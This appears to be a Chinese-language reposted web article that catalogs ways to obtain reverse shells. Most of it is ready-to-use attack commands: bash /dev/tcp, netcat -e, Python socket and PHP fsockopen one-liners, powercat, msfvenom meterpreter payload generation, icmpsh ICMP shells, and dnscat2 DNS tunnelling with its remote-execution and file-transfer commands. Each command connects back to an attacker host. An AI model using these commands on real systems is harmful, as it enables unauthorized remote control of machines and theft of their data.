首頁 > 運維 > 安全 > 反彈shell有哪些

反彈shell有哪些

王林
發布: 2023-05-18 22:01:04
轉載
2140 人瀏覽過

1.bash反彈

bash -i >& /dev/tcp/ip_address/port 0>&1
登入後複製

反彈shell有哪些

2.nc反彈

nc -e /bin/sh 192.168.2.130 4444
登入後複製

反彈shell有哪些

3.python

import socket,subprocess,os
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(( "192.168.2.130" , 4444 ))
os.dup2(s.fileno(), 0 )
os.dup2(s.fileno(), 1 )
os.dup2(s.fileno(), 2 )
p = subprocess.call([ "/bin/bash" , "-i" ])
登入後複製

反彈shell有哪些

4.powercat

Import-Module .\powercat.ps1
powercat -c 192.168.2.130 -p 4444 -e cmd.exe
登入後複製

反彈shell有哪些

#5.msf產生exe後閘

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.130 LPORT=4444 -f exe > shell.exe
登入後複製

6.php反彈shell

php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i &3 2>&3");'
登入後複製

反彈shell有哪些

反彈shell有哪些

7.ICMP

关闭icmp响应,不然shell一直跳,恢复是0

sysctl -w net.ipv4.icmp_echo_ignore_all=1

python icmpsh_m.py 源 目标
python icmpsh_m.py 192.168.2.137 192.168.2.135
登入後複製

在windows7運行:

icmpsh.exe -t 192.168.2.137
登入後複製

反彈shell有哪些

反彈shell有哪些

#8.DNS

https://downloads.skullsecurity.org/dnscat2/

這裡我們使用dnscat2,這裡是下載的,分為windows和linux版本,服務端和客戶端。

並且推薦使用vs2008編譯

安裝

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2
cd server
sudo gem install bundler
bundle install
sudo ruby ./dnscat2.rb
登入後複製

kali

ruby dnscat2.rb --dns host=0.0.0.0,port=53531
ruby dnscat2.rb --dns server=23.105.193.106,port=533,type=TXT --secret=123456(密钥)
ruby dnscat2.rb xxx.com
登入後複製

windows7中:

./dnscat --dns server=192.168.2.130,port=53531
./dnscat --dns server=192.168.2.130,port=53531 --secret=qwer1234(密钥)
./dnscat xxx.com
登入後複製

#連接成功後

反彈shell有哪些

反彈shell有哪些

檢視記錄

反彈shell有哪些

#選擇連線

反彈shell有哪些

使用shell

反彈shell有哪些

返回選擇shell

反彈shell有哪些

執行指令

反彈shell有哪些

其他指令

quit (退出控制台)
kill <id> (中断通道)
set(设值,比如设置security=open)
windows(列举出所有的通道)
window -i <id>(连接某个通道)
连接通道后,使用help同样可以看到其内支持的命令(单个命令后跟-h也会解释该命令):

clear(清屏)
delay(修改远程会话超时时间)
exec(执行远程机上的程序)
shell(得到一个反弹shell)
download/upload(两端之间上传下载文件)
supend(返回到上一层,等于快捷键ctrl+z)</id></id>
登入後複製

DNS隧道轉送

listen 127.0.0.1:6666 192.168.2.135:80
本机的6666就可以访问80端口
登入後複製

以上是反彈shell有哪些的詳細內容。更多資訊請關注PHP中文網其他相關文章!

相關標籤:
來源:yisu.com
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
熱門教學
更多>
最新下載
更多>
網站特效
網站源碼
網站素材
前端模板